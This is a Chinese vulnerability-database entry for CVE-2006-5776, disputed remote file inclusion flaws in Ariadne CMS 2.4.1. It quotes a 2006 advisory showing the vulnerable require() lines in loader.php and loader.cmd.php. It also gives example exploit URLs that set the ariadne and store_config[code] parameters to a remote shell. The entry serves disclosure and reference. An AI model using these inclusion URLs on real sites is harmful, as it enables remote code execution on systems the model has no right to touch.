Ariadne CMS多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1192955 漏洞类型 输入验证
发布时间 2006-11-06 更新时间 2006-11-09
CVE编号 CVE-2006-5776 CNNVD-ID CNNVD-200611-101
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110030
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-101
|漏洞详情
**争议**Ariadne2.4.1中存在多个PHP远程文件包含漏洞,远程攻击者可以通过在(1)ftp/loader.php和(2)lib/includes/loader.cmd.php内的ariadne参数执行任意PHP代码。注:CVE对此问题有争议,因为安装指导建议将这些文件放在web文档根目录之外,并且要求管理员修改一个包含文件内的$ariadne。
|漏洞EXP
************************************************************************
*******
# Title  :  Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities

# Author :   ajann

# Script Page :   http://www.ariadne-cms.org/en/download/

# Vuln;

************************************************************************
*******
[Files]
loader.php
loader.cmd.php
[/Files]

[Code,1]
loader.php Error:

..
....
require($ariadne."/configs/ariadne.phtml");
    require($ariadne."/configs/ftp/$configfile");
	require($ariadne."/configs/store.phtml");
	require($ariadne."/includes/loader.ftp.php");
	require($ariadne."/configs/sessions.phtml");
	require($ariadne."/stores/".$store_config["dbms"]."store.phtml");
	require($ariadne."/nls/en");
	require($ariadne."/modules/mod_mimemagic.php");
	
	require($ariadne."/modules/mod_virusscan.php");
....
..

Key [:] ariadne=[file]
Key [:] store_config[code]=[file]

Example:

http://target.com/path/ftp/loader.php?ariadne=Shell
http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Sh
ell
....

# ajann,Turkey
# ...
# Im not Hacker!
|参考资料

来源:XF
名称:ariadne-storeconfig-file-include(30018)
链接:http://xforce.iss.net/xforce/xfdb/30018
来源:BID
名称:20916
链接:http://www.securityfocus.com/bid/20916
来源:BUGTRAQ
名称:20061106Ariadne<=2.4.1MultipleRemoteFileIncludeVulnerabilities(New)
链接:http://www.securityfocus.com/archive/1/archive/1/450709/100/0/threaded
来源:VIM
名称:20061106RE:DISPUTE:PHPfileinclusioninAriadne2.4.1
链接:http://attrition.org/pipermail/vim/2006-November/001109.html
来源:VIM
名称:20061106DISPUTE:PHPfileinclusioninAriadne2.4.1
链接:http://attrition.org/pipermail/vim/2006-November/001108.html
来源:SREASON
名称:1827
链接:http://securityreason.com/securityalert/1827